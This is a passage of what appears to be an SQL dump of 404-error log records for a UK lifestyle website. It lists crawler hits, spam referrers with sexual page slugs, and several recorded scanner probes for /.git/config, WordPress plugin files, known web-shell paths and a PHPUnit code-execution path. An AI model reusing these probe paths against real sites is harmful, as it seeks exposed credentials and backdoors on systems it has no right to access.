AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37055,'2023-01-26 21:35:19','/969fcmxg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/',404,'GET',NULL,'94.180.206.83'),(37056,'2023-01-26 21:35:22','/glamour_models/beautiful-boobs/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/beautiful-boobs/',404,'GET',NULL,'167.235.242.95'),(37057,'2023-01-26 21:40:58','/tails52/t3tt8xjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37058,'2023-01-26 22:00:11','/tfcjmk6f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37059,'2023-01-26 22:01:36','/glamour_models/dancing-queens/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/dancing-queens/',404,'GET',NULL,'5.75.238.196'),(37060,'2023-01-26 22:01:58','/ayi08rog2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37061,'2023-01-26 22:09:31','/deps3nke2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37062,'2023-01-26 22:09:33','/9bgsgsvg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37063,'2023-01-26 22:29:22','/w929gq6g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37064,'2023-01-26 22:29:59','/internship/t74d6gkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37065,'2023-01-26 22:33:00','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:103.0) Gecko/20100101 Firefox/102.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37066,'2023-01-26 22:34:36','/diunb0pe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37067,'2023-01-26 22:41:43','/glamour_models/office-slut/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/office-slut/',404,'GET',NULL,'5.75.240.115'),(37068,'2023-01-26 22:55:54','/articles/grandi20','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37069,'2023-01-26 23:05:46','/isbzvn4g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37070,'2023-01-26 23:10:29','/unactive/19py5s0e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37071,'2023-01-26 23:31:57','/envoyship/dkqair6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37072,'2023-01-26 23:39:35','/ay3819dg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37073,'2023-01-26 23:52:41','/a4hleu0g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37074,'2023-01-26 23:56:48','/i2knjj9e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37075,'2023-01-27 00:03:31','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37076,'2023-01-27 00:19:25','/wzrh8bvg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37077,'2023-01-27 00:22:10','/transportal/iml6ck3h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37078,'2023-01-27 00:22:38','/popular/9o4h9b3f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37079,'2023-01-27 00:25:50','/dolichonyx/kepsx3de2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37080,'2023-01-27 00:37:27','/punner4/i4qdl33g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37081,'2023-01-27 00:43:56','/tfg83l6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37082,'2023-01-27 00:48:28','/9f1d1z5h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37083,'2023-01-27 00:58:32','/page/5','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64; trendictionbot0.5.0; trendiction search; http://www.trendiction.de/bot; please let us know of any problems; web at trendiction.com) Gecko/20170101 Firefox/67.0',NULL,404,'GET',NULL,'144.76.22.15'),(37084,'2023-01-27 01:18:02','/e/data/js/ajax.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',NULL,404,'GET',NULL,'146.148.160.146'),(37085,'2023-01-27 02:14:03','/muscivoraforficata/1cu88k4e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.32'),(37086,'2023-01-27 02:14:07','/isvydu2h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37087,'2023-01-27 03:02:39','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'3.99.224.57'),(37088,'2023-01-27 03:02:40','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'3.99.224.57'),(37089,'2023-01-27 03:02:40','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'3.99.224.57'),(37090,'2023-01-27 03:02:41','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'3.99.224.57'),(37091,'2023-01-27 03:02:42','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'3.99.224.57'),(37092,'2023-01-27 03:02:43','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'3.99.224.57'),(37093,'2023-01-27 03:23:31','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3790 Safari/537.36 Edg/78.0.142.6','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37094,'2023-01-27 03:36:53','/henroost/10ndrvpg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37095,'2023-01-27 03:54:15','/glamour_models/teasing-tina/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/teasing-tina/',404,'GET',NULL,'5.75.230.58'),(37096,'2023-01-27 03:58:29','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37097,'2023-01-27 04:05:25','/dief2n6e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37098,'2023-01-27 04:29:34','/glamour_models/kinky-red/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/kinky-red/',404,'GET',NULL,'49.12.187.66'),(37099,'2023-01-27 04:35:38','/amlj39bf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.121'),(37100,'2023-01-27 05:19:03','/wp-content/plugins/vr-calendar-sync/assets/js/public.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37101,'2023-01-27 05:19:03','/wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37102,'2023-01-27 05:19:03','/wp-content/plugins/quiz-master-next/README.md','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37103,'2023-01-27 05:19:04','/wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37104,'2023-01-27 05:19:04','/?p=1','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37105,'2023-01-27 05:19:05','/wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/2KtbHGuQpYZ3xWkvjGYBArKKrLA.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36',NULL,404,'GET',NULL,'185.65.134.167'),(37106,'2023-01-27 05:36:43','/wp-text/themes/seotheme/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',NULL,404,'GET',NULL,'20.125.141.130'),(37107,'2023-01-27 05:37:54','/.well-known/cgialfa','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',NULL,404,'GET',NULL,'20.125.141.130'),(37108,'2023-01-27 05:38:03','/wp-text/uploads/cgialfa','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',NULL,404,'GET',NULL,'20.125.141.130'),(37109,'2023-01-27 05:38:06','/admin/controller/extension/extension/alfacgiapi','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',NULL,404,'GET',NULL,'20.125.141.130'),(37110,'2023-01-27 05:38:25','/vendor/phpunit/phpunit/src/Util/PHP/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36',NULL,404,'GET',NULL,'20.125.141.130'),(37111,'2023-01-27 05:56:49','/catalytic-clothing-style-with-substance','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37112,'2023-01-27 05:56:52','/catalytic-clothing-style-with-substance/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37113,'2023-01-27 05:56:56','/cleanercise-workout-to-housework','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37114,'2023-01-27 05:57:00','/cleanercise-workout-to-housework/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37115,'2023-01-27 05:57:03','/cleaning-products-that-are-cruelty-free','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37116,'2023-01-27 05:57:07','/cleaning-products-that-are-cruelty-free/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37117,'2023-01-27 05:57:14','/discussing-plastics-with-jacob','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37118,'2023-01-27 05:57:17','/discussing-plastics-with-jacob/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37119,'2023-01-27 05:57:21','/ecover-products-contain-no-nasties','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37120,'2023-01-27 05:57:24','/ecover-products-contain-no-nasties/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37121,'2023-01-27 05:57:28','/fantastic-plant-astic','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37122,'2023-01-27 05:57:31','/fantastic-plant-astic/feed','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)',NULL,404,'GET',NULL,'195.191.219.132'),(37123,'2023-01-27 06:01:53','/wear-and-care-for-your-wardrobe','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.102'),(37124,'2023-01-27 06:07:21','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'54.160.175.151'),(37125,'2023-01-27 06:07:23','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'54.160.175.151'),(37126,'2023-01-27 06:07:24','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'54.160.175.151'),(37127,'2023-01-27 06:07:26','/.git/config','https://www.dailyjolly.co.uk','python-requests/2.18.4',NULL,404,'GET',NULL,'54.160.175.151'),(37128,'2023-01-27 07:04:00','/wdzcj21e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37129,'2023-01-27 07:06:09','/d535dkqe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(37130,'2023-01-27 07:20:07','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37131,'2023-01-27 08:02:58','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.4.2 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(37132,'2023-01-27 08:07:56','/tke2mr7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.1'),(37133,'2023-01-27 08:34:21','/glamour_models/sexy-suburban-milfs/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/sexy-suburban-milfs/',404,'GET',NULL,'5.75.248.248'),(37134,'2023-01-27 08:48:18','/glamour_models/blonde-cougar/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/blonde-cougar/',404,'GET',NULL,'167.235.195.59'),(37135,'2023-01-27 08:51:08','/wp-content/plugins/ninja-forms-uploads/readme.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36',NULL,404,'GET',NULL,'185.196.220.26'),(37136,'2023-01-27 09:05:11','/internship/au5y7z8f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(37137,'2023-01-27 09:25:50','/glamour_models/natalia-forrest/','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36','http://www.dailyjolly.co.uk/glamour_models/natalia-forrest/',404,'GET',NULL,'167.235.237.148'),(37138,'2023-01-27 09:36:38','/underactor/ds815kvf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37139,'2023-01-27 09:36:39','/wffm0a0e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37140,'2023-01-27 09:36:39','/aqumhx8f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37141,'2023-01-27 09:36:40','/aqkr7pjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37142,'2023-01-27 09:36:40','/elasmobranch/1uspfw8e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37143,'2023-01-27 09:36:40','/ais8949e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37144,'2023-01-27 09:36:41','/kmo3uqjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37145,'2023-01-27 09:36:41','/wjt4iyag2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37146,'2023-01-27 09:36:42','/kmomelpg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37147,'2023-01-27 09:36:42','/acc1qp7g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37148,'2023-01-27 09:36:43','/aaz3ov4g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37149,'2023-01-27 09:36:43','/server/1my8hc2g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37150,'2023-01-27 09:36:43','/de1rrmzf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37151,'2023-01-27 09:36:44','/declare-aw9kb2Zvcm1vZ2Vu3.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37152,'2023-01-27 09:36:44','/mordaciously69/tazifz0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37153,'2023-01-27 09:36:45','/detract/dpaawh2f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37154,'2023-01-27 09:36:45','/criminate32/a8l8g4bf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37155,'2023-01-27 09:36:45','/9ikiprjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37156,'2023-01-27 09:36:46','/daisy/wd2svvzf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(37157,'2023-01-27 09:36:46','/knap4/tz944p1h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 